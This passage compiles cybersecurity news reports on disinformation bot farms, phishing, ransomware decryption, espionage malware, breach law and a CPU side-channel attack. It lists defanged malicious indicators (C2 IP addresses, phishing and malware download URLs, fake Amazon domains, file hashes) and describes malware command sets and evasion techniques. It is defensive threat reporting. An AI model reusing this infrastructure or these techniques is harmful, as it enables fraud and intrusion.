• Only install apps from Google Play, not third-party sources. If you receive a message asking you to install an app from a website, immediately block the number and report the incident to your IT or Security team.
• Be mindful of the permissions that mobile apps ask for. Overly invasive permissions, even from legitimate apps, could create data risk for your organization.
• Implement a mobile security solution that can detect and protect against malware and keep your organization safe.

The U.S. Federal Bureau of Investigation (FBI), along with the domestic Cyber National Mission Force and several international intelligence agencies, have uncovered a sophisticated Russian-backed operation that used an artificial intelligence-powered bot farm to spread disinformation on social media platforms. The agencies - which included international partners such as the Netherlands General Intelligence and Security Service and the Canadian Centre for Cyber Security - have released a joint advisory to warn social media companies about Russian state-sponsored actors employing the Meliorator software for malign influence activity in foreign nations and the United States. While currently focused on X (formerly Twitter), analysts believe the tool's developers intend to expand to other platforms.

Meliorator Bot Farm Characteristics and Capabilities

[caption id="attachment_81055" align="alignnone" width="2004"] Agencies Involved in the investigation of Russian operation (Source: www.ic3.gov)[/caption] The Meliorator tool creates bot persona 'souls' (false identities) with varying levels of information on their profiles and relevant 'thoughts' (automated actions). The first bot archetype has complete profiles, including a profile photo, cover photo, and biographical data, while the second archetype has very little information. The third archetype appears real by generating a lot of activity and garnering followers. [caption id="attachment_81052" align="aligncenter" width="505"] Source: www.ic3.gov[/caption] The bot personas are capable of deploying content similar to typical social media users, mirroring disinformation from existing bot personas, perpetuating specified pre-existing false narratives, and formulating messaging based on the specific archetype of the bot. To avoid detection, the creators of the Meliorator tool used various obfuscation techniques, including IP address obfuscation, bypass of dual factor authentication, and modification of browser user agent strings to appear more consistent. The bot personas also follow genuine accounts reflective of their political leanings and interests listed in their biography, making them appear more authentic to viewers. The tool has been used by FSB services since 2022 to generate mass quantities of social media profiles that appear to be authentic. The software includes an administrator panel called "Brigadir" and a seeding tool named "Taras," which contains backend files to control the personas used to spread disinformation. These "souls" are stored in a MongoDB database for easy manipulation. Operators access Meliorator through virtual network computing that is hosted at dtxt.mlrtr[.]com using project management software from Redmine.

Justice Department Seizes Associated Domains

In relation to the joint action by intelligence agencies, the U.S. Justice Department announced the seizure of two related domain names, and 968 social media accounts used in malign influence operations. According to the press release, the bot farm was developed by an individual identified as Individual A, who worked as the deputy editor-in-chief at RT, a state-run Russian news organization. In early 2022, when RT leadership sought to develop alternative means for distributing information beyond traditional news broadcasts, Individual A had led the development of software to create and operate a social media bot farm, with the capability of creating fictitious online personas on a wide-scale basis to advance the mission of the FSB and the Russian government. The bot farm's operators used the network to spread disinformation on various topics, including the Russia-Ukraine conflict. These included videos in which President Putin justified Russia's actions in Ukraine, and claims that certain areas of Poland, Ukraine, and Lithuania were "gifts" to those countries from the Russian forces that liberated them from Nazi control during World War II. [caption id="attachment_81046" align="alignnone" width="420"] Source: justice.gov[/caption] [caption id="attachment_81047" align="alignnone" width="430"] Source: justice.gov[/caption] The bot farm was also used to spread videos claiming that the number of foreign fighters fighting for the Ukrainian forces was significantly lower than public estimates. Deputy Attorney General Lisa Monaco stated, “Today’s action demonstrates that the Justice Department and our partners will not tolerate Russian government actors and their agents deploying AI to sow disinformation and fuel division among Americans.” “As malign actors accelerate their criminal misuse of AI, the Justice Department will respond and we will prioritize disruptive actions with our international partners and the private sector. We will not hesitate to shut down bot farms, seize illegally obtained internet domains, and take the fight to our adversaries,” she added. The FSB’s use of U.S.-based domain names, which the software used to register the bots, violates the International Emergency Economic Powers Act. In addition, the accompanying payments for that infrastructure violate federal money laundering laws. X (formerly Twitter) took action to voluntarily suspend bot accounts identified in the investigation for violation of its terms of service. The FBI worked with cybersecurity agencies from Canada, the Netherlands and other partners to analyze the bot farm's technology. The Justice Department has released a joint cybersecurity advisory on the research findings of the intelligence agencies, allowing social media platforms and researchers to identify and prevent further use of the technology. [caption id="attachment_81049" align="alignnone" width="1434"] Source: www.ic3.gov[/caption] The publication includes IP addresses, SSL certificates, mail server domains, and related details associated with the infrastructure of the Meliorator bot network.

Cyble Research and Intelligence Labs (CRIL) researchers have observed a new campaign in which threat actors claiming to be from India's Regional Transport Office (RTO) have targeted Indian WhatsApp users for phishing operations. The campaign marks a shift from earlier tactics, such as the use of WhatsApp in recent campaigns instead of SMS for delivering phishing messages. This shift includes a change in focus from banking customers to the targeting of government agencies and utility companies.

Regional Transport Office (RTO) WhatsApp Phishing Scam

The researchers said that since the beginning of 2024, Indian citizens have been observed receiving phishing messages on WhatsApp that impersonate the Regional Transport Office (RTO), also commonly referred to as Vahan Parivahan, a governmental organization in India responsible for vehicle registration, driver licensing, and other transport-related matters. [caption id="attachment_80990" align="alignnone" width="1587"] Source: cyble.com/blog[/caption] Targets have received various WhatsApp messages claiming that their vehicle was found to be in violation of traffic rules, with a download link to an app titled "VAHAN PARIVAHAN," supposedly intended for viewing official citations or a "challan"(government recognized document or receipt). These phishing messages abused legitimate regional RTO logos in their WhatsApp profile pictures to lend further cover and to lure potential victims to download the attached malware .APK application file. Once installed, the app requests permissions to access SMS messages and contacts. It runs in the background, collecting device information and sending it to the attackers through a Telegram bot. The malware then initiates a service to connect to a Firebase URL to retrieve additional lists of phone numbers and text messages. This service is used to deliver SMS messages from infected devices to phone numbers mentioned in the Firebase server. The researchers from Cyble had earlier noticed a remarkably similar campaign used to target the customers of major Indian banks through the use of malicious bank-related applications purporting to represent major Indian banks, even bearing similar names, icons and user interfaces to official banking apps. The malware in the earlier campaign was used to collect banking credentials, credit card details, personally identifiable information (PII) and email credentials from victims.

Researchers Observe Advancements in Malware Campaigns

The researchers noted that threat actors have been observed deploying advanced malware strains that do not rely on launcher activities. Examination of the manifest file from the recent campaign reveals the absence of a launcher activity, preventing an app icon from appearing on the app drawer of infected devices and making it harder for victims to identify and uninstall the malware. The RTO scam reflects broader changes among such campaigns, marked by:

• Shift from SMS to WhatsApp for distribution of phishing messages.
• Focus beyond banking targets to impersonation of legitimate utility bills and government schemes/authorities.
• Use of Malware-as-a-Service (MaaS) in campaigns.
• Additional stealthy tactics such as leaving out launcher activities to evade detection.

Along with sharing of potential Indicators of Compromise (IOCs) and classifying the campaign under MITRE categories, the researchers have listed some recommendations to protect against the campaign:

• Download software only from legitimate official sources such as the Google Play Store or the iOS App Store.
• Use of capable antivirus and internet security tools to scan downloaded software packages across internet-connected devices (PCs, laptops, and mobile devices).
• Use of stronger passwords and multi-factor authentication where possible.
• Use of biometric security functionality such as fingerprints or facial recognition to secure devices.
• Maintain vigilance regarding links received via SMS messages or emails.
• Enable Google Play Protect on Android devices.
• Be careful with permissions granted to downloaded apps.
• Regularly update devices, operating systems, and applications.

The researchers also noted the possibility of stealthy transfer of received digital payment (Unified Payments Interface) verification messages to attacker-operated devices to compromise payment systems within the campaign, as observed in other attacks. [caption id="attachment_80992" align="alignnone" width="1282"] Source: cyble.com/blog[/caption]

Researchers have discovered a critical flaw in the cryptographic schema of the DoNex ransomware and all of its variants and predecessors. Since then, they have collaborated with law enforcement agencies to discreetly provide a decryptor to affected DoNex victims since March 2024. The cryptographic vulnerability was publicly discussed at Recon 2024, prompting the researchers to officially disclose details of the flaw and its implications.

DoNex Ransomware Operations

Avast researchers noted that the DoNex ransomware has undergone several rebrandings after initially identifying as Muse in April 2022. Subsequent iterations of DoNex included a rebrand to a purported Fake LockBit 3.0 in November 2022, then to DarkRace in May 2023, and finally to DoNex in March 2024. Since April 2024, the researchers noted that no newer samples were detected, and that the ransomware group's official TOR address remained inactive, suggesting that DoNex may have ceased its evolution and rebranding attempts. DoNex ransomware employs a complex encryption process. During its execution, an encryption key is generated using the CryptGenRandom function. This key initializes a ChaCha20 symmetric key, which is then used to encrypt files. After encryption, the symmetric key is encrypted with RSA-4096 and appended to the affected file. For files up to 1 MB, the entire file is encrypted, while larger files are encrypted in segments of blocks. The ransomware's configuration, along with details over whitelisted extensions, files, and services to terminate, are stored in an XOR-encrypted configuration file. While the researchers have not detailed the exact process they used to decipher the decryption, more details related to the same cryptographic vulnerability are available from files related to the Recon 2024 event talk titled "Cryptography is hard: Breaking the DoNex ransomware." Gijs Rijnders, a malware reverse engineer and cyber threat intelligence analyst working for the Dutch National Police, hosted the talk. [caption id="attachment_80864" align="alignleft" width="298"] DoNex decryptor used by Dutch National Police, different from Avast version. (Source: cfp.recon.cx)[/caption] DoNex primarily targeted victims in the US, Italy, and Belgium, using focused attacks. The researchers confirmed that all variants of the DoNex ransomware along with its earlier versions can be decrypted using the released DoNex decryptor.  

  [caption id="attachment_80869" align="alignnone" width="697"] (Source: decoded.avast.io)[/caption]

Identifying DoNex Ransomware and Decryption

Victims of the DoNex ransomware can recognize an attack through the ransom note left by the malware. Although different variants (Fake LockBit, DarkRace and DoNex) of DoNex produce distinct ransom notes, they share a similar layout. [caption id="attachment_80867" align="alignnone" width="710"] Avast version of DoNex decryptor (Source: decoded.avast.io)[/caption] The researchers have shared instructions for using their decryptor against DoNex ransomware encrypted files:

1. Download the provided decyptor. (The researchers recommend running the 64-bit version of the program due to memory requirements.)
2. Run the decryptor's executable file as an administrator. The program should run as a wizard, automatically guiding you through the decryption process.
3. While the program lists all local drives by default, the user is requested to provide a list of possible locations meant to be decrypted.
4. Users are then requested to provide an encrypted file (from any variant of DoNex) as well as a copy of the original file before encryption. The researchers emphasize selecting the biggest possible pair of files for this process.
5.  The next process of the wizard will begin the password cracking process. The researchers state that while this process of cracking only takes a second, it would require a huge volume of memory. After the step has been completed, users can get ready to begin with the decryption process for all the files on their entire system.
6. In the final step, users can opt to back up encrypted files on their system, which may help in the event of failures during the decryption process. The researchers stated that the option is set at default.
7. Users can let the program run in an attempt to decrypt all the DoNex encrypted files on their system.

The researchers have also shared Indicators of compromise (IOCs) of the FakeLockBit 3.0, Dark Race and DoNex variants of the ransomware.

A recently passed Pennsylvania law aims to bolster consumer protections in the aftermath of data breaches. Act 33 of 2024, which is set to take effect in late September of this year, mandates stricter time limits for organizations to issue data breach notices and free provision of credit monitoring to affected individuals in the event of a data breach.

Key Provisions of Act 33 Pennsylvania Law

Under the provisions of the new law, organizations must notify the Pennsylvania Attorney General's Office if a data breach is found to affect more than 500 residents within the state of Pennsylvania. [caption id="attachment_80831" align="alignnone" width="2800"] Source: www.legis.state.pa.us[/caption] The notice is required to include the following details:

1) The organization name and location. (2) The date of the breach of the security of the system. (3) A summary of the breach incident of the security of the system. (4) An estimated total number of individuals affected by the breach of the security of the system. (5) An estimated total number of individuals in this Commonwealth affected by the breach of the security of the system.

Along with the reporting requirements, one of the key provisions of the law is the requirement for organizations to provide free credit reports and one year of credit monitoring to all affected consumers. The law introduces a new era of protection for consumers, requiring organizations to assume all costs and fees associated with providing affected individuals with access to credit reports and credit monitoring services. This provision means that individuals from Pennsylvania will not have to pay for these services, which can provide peace of mind in the event of a data breach and add an additional layer of protection to help prevent identity theft and financial fraud. The law defines personal information as an individual's first name or first initial and last name in combination with certain sensitive data elements, such as Social Security numbers, driver's licenses, or financial account numbers. The law is an extension of the amendment act of December 22, 2005 (P.L.474, No.94), which states:

"An act providing for security of computerized data and for the notification of residents whose personal information data was or may have been disclosed due to a breach of the security of the system; and imposing penalties," further providing for definitions, for notification of the breach of the security of the system and for notification of consumer reporting agencies; and providing for credit reporting and monitoring.

The Act 33 law received unanimous support in both chambers of the state legislature, reflecting the broad recognition of the need for stronger data protection measures.

Act Comes Amidst Geisinger Medical Center Data Breach Fall Out

Reports of data breach incidents across the United States have surged in recent years, with a record of 3,122 incidents reported in 2023 nationwide – a 72% increase from the previous high in 2021. According to data from the Identity Theft Resource Center, these breaches affected hundreds of millions of Americans and resulted in billions of dollars in losses. The new law comes in the wake of high-profile breaches like the one at Pennsylvania's Geisinger Medical Center, which potentially exposed personal information of approximately one million patients. A former employee in connection to the data breach has been arrested. Jonathan Friesen, Geisinger chief privacy officer, stated in response to the arrest, “Our patients’ and members’ privacy is a top priority, and we take protecting it very seriously.” He added, “We continue to work closely with the authorities on this investigation, and while I am grateful that the perpetrator was caught and is now facing federal charges, I am sorry that this happened.” Disgruntled former patients of the hospital have joined in a class action lawsuit filed against Geisinger, demanding compensation. One former patient, James Wierbowski, filed a lawsuit on June 28, seeking monetary relief that could amount to more than $5 million.

Security researchers discovered a new sophisticated cyberespionage tool targeting Russian government entities in May 2024. The tool, dubbed CloudSorcerer, exploits popular cloud infrastructure services such as Microsoft Graph, Yandex Cloud and Dropbox for use as command and control (C2) servers for stealth monitoring, data collection and exfiltration operations.

Technical Details of CloudSorcerer Campaign

Researchers from Kaspersky believe that a new APT group is behind the CloudSorcerer malware. The malware is a single Portable Executable (PE) binary written in the C language and adjusts Its functionality depending on the process from which it is executed. Upon execution, the malware calls the GetModuleFileNameA function to determine the name of the process from which it has been run and then compares these process names to a set of hardcoded strings indicating browser, mspaint.exe, and msiexec.exe identifiers. The malware activates different functions depending upon the identified process name:

• In mspaint.exe: Acts as a backdoor within the program to collect data and execute code.
• In msiexec.exe: Initiates C2 communication.
• In browser or other detected processes: Injects shellcode into targeted processes before terminating.

The malware's backdoor module begins by collecting system information about the victim machine, while running in a separate thread. This information includes computer name, user name, Windows subversion information, and system uptime. All the collected data is stored in a specially created structure. Once the information gathering is complete, the data is written to the named pipe \.\PIPE[1428] connected to the C2 module process. It then executes various commands based on received instructions, such as gathering drive information, collecting file and folder data, executing shell commands, manipulating files, injecting shellcode into processes, running advanced tasks like creating processes, modifying registry keys and managing network users. These commands are specified under a unique COMMAND_ID for each operation within the malware program: [caption id="attachment_80799" align="alignnone" width="863"] Source: securelist.com (Kaspersky)[/caption]

0x1 – Collect information about hard drives in the system, including logical drive names, capacity, and free space. 0x2 – Collect information about files and folders, such as name, size, and type. 0x3 – Execute shell commands using the ShellExecuteExW API. 0x4 – Copy, move, rename, or delete files. 0x5 – Read data from any file. 0x6 – Create and write data to any file. 0x8 – Receive a shellcode from the pipe and inject it into any process by allocating memory and creating a new thread in a remote process. 0x9 – Receive a PE file, create a section and map it into the remote process. 0x7 – Run additional advanced functionality.

The researchers also observed the use of Github pages as C2 servers, stealthily hidden as hex code within the author section of the profile. These profiles contained forks of public legitimate code repositories without any modification or changes to appear legitimate. The same hex string was also observed hidden within the names of public photo albums hosted on the Russian album-sharing service, https://my.mail[.]ru. Associated profiles on both services contained a photo of a male from a public photo bank. [caption id="attachment_80806" align="aligncenter" width="253"] Source: securelist.com (Kaspersky)[/caption] The malware picks up hex strings from these sources, breaking them into segments that represent different instructions. The first segment of the decoded hex string indicates the cloud service intended for malware usage. Example, a byte value of “1” represents Microsoft Graph cloud, byte “0” represents Yandex cloud. The segments that follow form a string used to authenticate various different cloud APIs, as well as a subset of functions for specific interactions with the selected cloud services.

Similarity to CloudWizard APT Campaign

While there researchers noted similarities in the campaign's modus operandi and tactics to the previously known CloudWizard APT group, they state that the significant differences in code and functionality in the malware used by both groups suggest that CloudSorcerer is likely from the work of a newer APT developing its own unique tools. The CloudSorcerer campaign represents the use of sophisticated operations against Russian government entities. Its use of popular cloud services such as Microsoft Graph, Yandex Cloud, and Dropbox for C2 infrastructure, along with GitHub and MyMail photo albums for initial C2 communications, demonstrates a well-organized approach to espionage. The malware’s ability to dynamically adapt its behavior depending upon the infected process along with its complex use of Windows pipes, further highlights its intricacy. The researchers have shared a list of indicators of compromise (IOCs) to help protect against deployment of the CloudSorcerer malware.

GootLoader, a sophisticated JavaScript-based malware has continued to confound cybersecurity experts with its unique evasion techniques. However, researchers have discovered a new method to circumvent its  anti-analysis methods through debugging it as Node.js code in Visual Studio Code. The research has cast new light on the malware's inner workings and highlighted various flaws in common sandbox-based analysis methods.

Debugging GootLoader's Evasive Techniques

While it is common among malware to perform sleep operations through the calling of the Wscript.sleep() or setTimeout() methods, most malware sandboxes easily detect these 'malware sleeping' methods. However, GootLoader employs advanced time-based delays and loop iterations for more effective evasion that can trick most sandbox environments. [caption id="attachment_80607" align="alignnone" width="1600"] Source: unit42.paloaltonetworks.com[/caption] While Gootkit had been first identified in 2014, it has undergone many changes over time. The original Gootkit malware consisted a Windows executable, but since 2020 Javascript-based variants of the malware named as Gootkit Loader, were spotted being distributed through through the use of fake forum posts. GootLoader can be used deliver several other types of malware, including ransomware. Despite these changes, the group has retained the same distribution tactics in 2024, with the forum posts nearly identical in content and appearance. Researchers from Palto Alto Networks analyzed a GootLoader malware sample through the novel use of Node.js debugging in Visual Studio Code on a Windows host. This approach allowed for step-by-step code execution and breakpoint setting, providing further insights into the malware's flow control and execution logic than typical standalone execution. The analysis revealed that the malware employs time-consuming while loops and array functions to deliberately delay the execution of its malicious code through the use of self-induced sleep periods to obfuscate its true nature. The researchers observed an infinite loop function, that supplied a variable with the same value on repeat , and upon stepping further into the malware's code, had discovered a 'horseq7' function array name. Upon analysis the code appeared to be stuck in a loop as it had taken over 10 minutes for the function to obtain the required counter value within the analysis environment. This function appeared to be where the actual malicious program began execution, with the researcher identifying several different counter values and respective functions. [caption id="attachment_80611" align="alignnone" width="2174"] Source: unit42.paloaltonetworks.com[/caption]

Flaws Within Sandbox Testing in Security Environments

Sandboxing techniques are commonly employed by security researchers to identify malicious binaries, their behaviour and execution within the benefit of a controlled environment. These sandboxes environments can  face hurdles such as the passing of large volumes of binaries against limited resources. GootLoader's intricate evasive techniques present various hurdles for sandbox environments, particularly those with severely limited computing resources, and time-constrained analysis. Understanding these techniques is crucial for researchers to develop more effective detection and analysis methods, such as enhanced sandbox environments to handle time-based evasion tactics and development of more sophisticated static and dynamic analysis tools which can potentially detect such circumventing functions.

Europol's recent paper sheds light on formidable challenges posed by Privacy Enhancing Technologies (PET) in Home Routing systems. These technologies, aimed at safeguarding user privacy, inadvertently hinder law enforcement agencies (LEAs) from intercepting communications originating from foreign SIM cards. Home Routing allows for service providers to continue providing services to paying customers even after they have travelled abroad. This limitation not only impedes investigations involving foreign nationals but also complicates cases where citizens use foreign SIM cards domestically. The new paper details how this technology could potentially delay or even prevent lawful access to evidence in serious criminal cases.

Europol Details Home Routing Intervention Challenges

The Europol paper states that the core issue lies in the implementation of Privacy Enhancing Technologies (PET) within Home Routing of telecommunication network. When PET is enabled, the visiting network can't access encryption keys used by the home network, making it impossible to retrieve unencrypted data. This creates a roadblock for LEAs, as they can no longer intercept communications from foreign SIM cards without cooperation from the home country's service provider. The inability to intercept communications from foreign SIM cards affects not only investigations of foreign nationals but also cases involving citizens using foreign SIM cards in their own country. This limitation extends beyond simple inconvenience:

• LEAs become dependent on cooperation from service providers in the suspect's home country.
• Domestic interception orders can't be enforced across borders.
• European Investigation Orders, while available, can take up to 120 days – too long for urgent cases.

These challenges stem from the disparity between the European single market, which allows service providers to operate across borders while law enforcement still remains limited by national jurisdictions.

Proposed Solutions to Home Routing

To address these issues, potential solutions must balance maintaining investigatory powers with protecting secure communications and the confidentiality of criminal investigations. The solutions outlined in the paper range from disabling the Privacy Enhancing Technologies (PET) in Home Routing networks, creation of a new legal framework to allow domestic law enforcement agencies to request the interception of a suspect's communication in the territory of another member state within the EU coupled with a common interface to interpret these laws and regulations across borders. The paper details these two potential approaches as solutions to navigate these challenges: 1. Legally mandating the disabling of PET in Home Routing:

• Maintains current security levels and law enforcement capabilities
• Allows domestic service providers to execute interception orders for foreign SIM cards
• Technically feasible and easily implemented
• Preserves privacy at the same level as communication via national SIM cards

2. Enabling cross-border interception requests:

• Allows LEAs to request interception from service providers in other EU member states
• Maintains PET for all users
• Requires development of cross-border standards and interfaces
• May compromise operational security by revealing persons of interest to foreign entities

The paper admits that the success of these solutions will depend on the cooperation of telecommunication service providers, law enforcement agencies, and national authorities. These challenges accentuate the criticalness of developing a solution that that balances the need for European law enforcement agencies to access data along with the need to protect the privacy and security of individuals with region. Earlier in 2019, the European Council raised the need for addressing and mitigating potential challenges to law enforcement agencies from the deployment of 5G networks and services. In the paper titled, 'The significance of 5G to the European Economy and the need to mitigate security risks linked to 5G', the Council  stressed on the need to, "address and mitigate potential challenges arising from the deployment of 5G networks and services to law enforcement including e.g. lawful interception."

As online shoppers ready themselves for the approaching Amazon Prime Day on July 16-17, 2024, a day known for unusually extensive deals and exclusive offers, cybercriminals appear ready to lure potential victims. Researchers observed an increase in new domains that incorporated the use of the Amazon brand over the last month, with the vast majority of these found to be suspicious and designed to steal sensitive information such as login credentials, payment details, and personal data from victims.

Amazon Prime Day Fake Domains

Researchers from Check Point observed the registration of over 1,230 such domains during June 2024, with   85% of these identified domains flagged as malicious or suspicious. These domains pose a significant threat to shoppers' personal and financial information. The researchers identified phishing activity, deceptive emails and malicious file attachments:

• Fake Domains: Newly created Amazon impersonating domains that mimic various legitimate Amazon Mexico websites to trick users into providing sensitive information and details. [caption id="attachment_80552" align="alignnone" width="705"] Source: blog.checkpoint.com[/caption] Examples of these fake domains include: -amazon-onboarding[.]com -amazonmxc[.]shop -amazonindo[.]com -shopamazon2[.]com -microsoft-amazon[.]shop -amazonapp[.]nl -shopamazon3[.]com -amazon-billing[.]top

• Distribution of malicious phishing files over alleged payment failures: Phishing campaigns use urgent language to prompt immediate action. One such attempt claimed a payment failure for an Amazon Prime Video order, directing users to a fraudulent login page.

[caption id="attachment_80546" align="alignleft" width="414"] Source: blog.checkpoint.com[/caption] Some attacks distribute files with misleading names like "Mail-AmazonReports-73074[264].pdf," containing false alerts about account suspension to steal payment details. The file lures victims by creating a false sense of urgency in informing them that their Amazon account had been suspended due to mismatched billing information, instructing them to update their payment details through a provided phishing link: trk[.]klclick3[.]com. The message within the file threatens account closure if immediate action is not taken by the victim, stoking fears about possible account termination or loss of access to services.   [caption id="attachment_80543" align="alignnone" width="973"] Source: blog.checkpoint.com[/caption]

Staying Safe With Online Shopping During Amazon Prime Day

According to a report on the Global State of Scams by the Global Anti-Scam Alliance consumers lost over  USD $1 trillion globally in 2023. Researchers behind the recent study have shared the following tips to help online shoppers stay safe during the Amazon Prime Day sales:

• Scrutinize URLs for misspellings or unusual domain extensions.
• Use strong, unique passwords for your Amazon account.
• Verify website security by looking for "https://" and the padlock icon.
• Be wary of requests for excessive personal information.
• Approach urgent emails with caution and verify their legitimacy.
• Trust your instincts about deals that seem too good to be true.
• Use credit cards for better fraud protection when shopping online.

A customer trust report from Amazon in March of this year indicated that over two-thirds of observed scams purported to be order or account issues. A paraphrased customer quote within the report stated:

“I got a random call from someone who claimed I bought something on Amazon that I hadn’t and they wanted my account information to verify this was an error.”

Amazon maintains a separate email address for customers to report scams at reportascam@amazon.com. In 2023, the e-commerce giant had taken down over 40,000 phishing websites and 10,000 phone numbers. Amazon also partners with organizations such as the Better Business Bureau (BBB, the Anti-Phishing Council in Japan, Microsoft and several cross-industry investigative groups to collaborate and add depth to the information collected by customers over reported scams. It is unknown if Amazon is taking any specific action related to scams that claim association with the Amazon Prime Day event.

The Mekotio banking trojan has resurfaced as a significant threat to financial institutions and individuals across Latin America. The Mekotio malware active since 2015, has primarily been used against several persistent target countries such as Brazil, Chile, Mexico, Spain and Peru with the focus of stealing sensitive information such as banking credentials. Mekotio shares similarities with other Latin American banking malware, such as Grandoreiro, who's operations had been recently disrupted by law enforcement.

Mekotio Infection and Operation

Researchers from Trend Micro noticed an uptick in the use of the Mekotio malware across campaigns. The researchers stated that Mekotio typically infiltrates systems through phishing emails purporting to be communications from tax agencies. These messages often claim the recipient has unpaid tax obligations while embedding malicious ZIP file attachments or links that download and execute the malware on the victim's system. [caption id="attachment_80407" align="alignnone" width="2247"] Source: trendmicro.com[/caption] Once activated, Mekotio gathers system information and establishes a connection with a command-and-control server. The malware performs the following operations on infected systems:

• Credential theft: Mekotio displays fake pop-ups mimicking legitimate banking sites to trick users into entering their login details.
• Information gathering: The trojan captures screenshots, logs keystrokes and steals clipboard data.
• Persistence: Mekotio employs tactics like adding itself to startup programs or creating scheduled tasks to maintain its presence on infected systems.

Several security researchers have investigated previous campaigns involving the use of the Mekotio malware, often noting it as a geolocation-specific Trojan. A threat summary from Microsoft Security Intelligence states, "The Mekotio Trojan evades detection using a malicious DLL that executes using DLL sideloading, since the DLL and executable loading the DLL is dropped in the same folder. The folder is the first location where an executable searches for a loading module to help execute the malicious dropped DLL before reaching the original DLL." The page also notes that victims may be restricted from accessing legitimate banking websites after infection.

Prevention and Mitigation Against Mekotio

The researchers have advised the maintenance of proper practices to combat threats such as Mekotio. These include:

• Being skeptical of unsolicited emails and verifying the sender's email address.
• Avoiding clicking on links and downloading attachments unless absolutely certain of the sender's identity.
• Verifying sender identity by contacting the sender through known contact details.
• Using email filters and anti-spam software, and ensuring they are up to date.
• Reporting phishing attempts to IT and security teams when applicable.
• Educating employees on security best practices, including phishing and social engineering tactics.

The researchers also shared the following potential indicators of compromise: File Hashes: 5e92f0fcddc1478d46914835f012137d7ee3c217 f68d3a25433888aa606e18f0717d693443fe9f5a 3fe5d098952796c0593881800975bcb09f1fe9ed 1087b318449d7184131f0f21a2810013b166bf37 ef22c6b4323a4557ad235f5bd80d995a6a15024a C&C servers: 23[.]239[.]4[.]149:80 68[.]233[.]238[.]122:80 34[.]117[.]186[.]192:80 68[.]221[.]121[.]160:9095 68[.]221[.]121[.]160:80 tudoprafrente[.]org tudoprafrente[.]co:7958 Downloads: hxxps://intimaciones[.]afip[.]gob[.]ar[.]kdental[.]cl/Documentos_Intimacion/ hxxps://techpowerup[.]net/cgefacturacl/descargafactmayo/eletricidad/ hxxps://christcrucifiedinternational[.]org/descargafactmayo/eletricidad/ By adhering to these guidelines, maintaining vigilance and scrutinising possible attack indications, organizations and individuals can significantly reduce their risk of falling victim to the Mekotio banking trojan.

A known threat actor on the BreachForums who uses the moniker '888' has shared data allegedly stolen from Shopify in a data breach incident. The data is claimed to consist personal details, email subscriptions and order-related information of its users. Shopify Inc. is a Canada-based multinational business that offers a proprietary e-commerce platform along with integrations to allow individuals, retailers and other businesses to setup their own online stores or retail point-of-sale websites.

Alleged Shopify Data Breach

The Shopify data breach claims to contain 179,873 rows of user information. These records allegedly include Shopify ID, First Name, Last Name, Email, Mobile, Orders Count, Total spent, Email subscriptions, Email subscription dates, SMS subscription, and SMS subscription dates. [caption id="attachment_80373" align="alignnone" width="1723"] Source: BreachForums[/caption] The Cyber Express could not verify the authenticity of these claims but the threat actor has a high-ranking reputation within the BreachForums community that has earned him the title of 'Kingpin.' The breach could possibly have stemmed from a recent data breach incident impacting Evolve Bank and Trust. Evolve Bank and Trust is a supporting partner of Shopify Balance, a money management integration built-in to the admin pages of Shopify stores. The bank is also a third-party issuer of Affirm debit cards. [caption id="attachment_80362" align="aligncenter" width="272"] Source: X.com(@lvdeeaz)[/caption]

Recent Evolve Bank and Trust Data Breach

Towards the end of June, the Evolve Bank confirmed that it had been impacted by a cybersecurity incident claimed by LockBit. The bank disclosed that the stolen data included sensitive personal information such as names, social security numbers(SSNs), dates of birth, and account details, among other data. In an official statement in response to the Evolve data breach, the bank said, “Evolve is currently investigating a cybersecurity incident involving a known cybercriminal organization that appears to have illegally obtained and released on the dark web the data and personal information of some Evolve retail bank customers and financial technology partners’ customers (end users).” Later, the financial firm Affirm Holdings had confirmed that it had also been affected by the Evolve Bank and Trust Data Breach. The firm stated in a security notice on its website, "Affirm is aware of a cybersecurity incident involving Evolve, a third party vendor that serves as an issuing partner on the Affirm Card. We are actively investigating the issue. We will communicate directly with any impacted consumers as we learn more." Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A Pakistan-linked hacking group has unleashed an updated version of its Android spyware, expanding its reach to target mobile gamers, weapons enthusiasts and TikTok users, according to cybersecurity researchers. The researchers identified four new malicious Android apps associated with Transparent Tribe, a group suspected of ties to Pakistani state interests. The apps continue the hackers' strategy of embedding spyware into seemingly innocuous video browsing applications.

Evolving Tactics of Transparent Tribe

Transparent Tribe, also known as APT 36, has targeted Indian government and military personnel since at least 2016. The group is known to rely heavily on social engineering to deliver Windows and Android spyware through phishing emails and compromised websites. Researchers from SentinelLabs identified the newly discovered apps masquerading as YouTube or TikTok video players, an app for lewd videos, a mobile gaming portal, and a weapons enthusiast app. When installed, they request extensive permissions to access the device's location, contacts, SMS messages, call logs, camera and microphone. [caption id="attachment_80043" align="alignnone" width="559"] Source: sentinelone.com[/caption] [caption id="attachment_80044" align="alignnone" width="974"] Source: sentinelone.com[/caption] While the permissions requested are similar to those in the previous campaign, the reduction in permissions suggests the app developers are focused on making CapraRAT a surveillance tool more than a fully featured backdoor. Researchers noted that the new CapraRAT APK files contained references to Android’s Oreo version (Android 8.0), released in 2017. Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and less likely to be compatible with modern Android devices. The new CapraRAT packages also contain a minimal new class called WebView, responsible for maintaining compatibility with older versions of Android via the Android Support Library. This update allows the app to run smoothly on modern versions of Android, such as Android 13 and 14. All four newly discovered apps communicate with the same command-and-control server, using either the domain shareboxs[.]net or a hardcoded IP address. This infrastructure has been linked to Transparent Tribe operations since at least 2022.

Researcher Recommendations

Cybersecurity experts recommend users exercise caution when installing apps, especially those from unofficial sources. Users should critically evaluate requested permissions and be wary of apps that ask for access unrelated to their stated purpose. Organizations dealing with sensitive information should implement mobile device management solutions and educate employees about the risks of installing unauthorized apps. For example, an app that only displays TikTok videos does not need the ability to send SMS messages, make calls, or record the screen. The researchers have advised professionals to treat the use of port 18582 as suspect, along with other indicators of compromise in their report, such as SHA1 checksums for files used in the campaign along with domain/IP network indicators.

Security researchers have identified a novel side-channel attack that can compromise the security of modern Intel CPUs variants, including Raptor Lake and Alder Lake. The attack, dubbed Indirector, leverages weaknesses in the Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and steal sensitive information from processors. The IBP is a critical hardware component in modern CPUs that predicts the target addresses of indirect branches. Indirect branches are control flow instructions whose target address is computed only at runtime, making them challenging to predict accurately. Attacks using Branch Target Injection (BTI) in their operations have been the focus of extensive research by security experts since the discovery of the Spectre and Meltdown attacks in 2018.

Indirector CPU Vulnerability

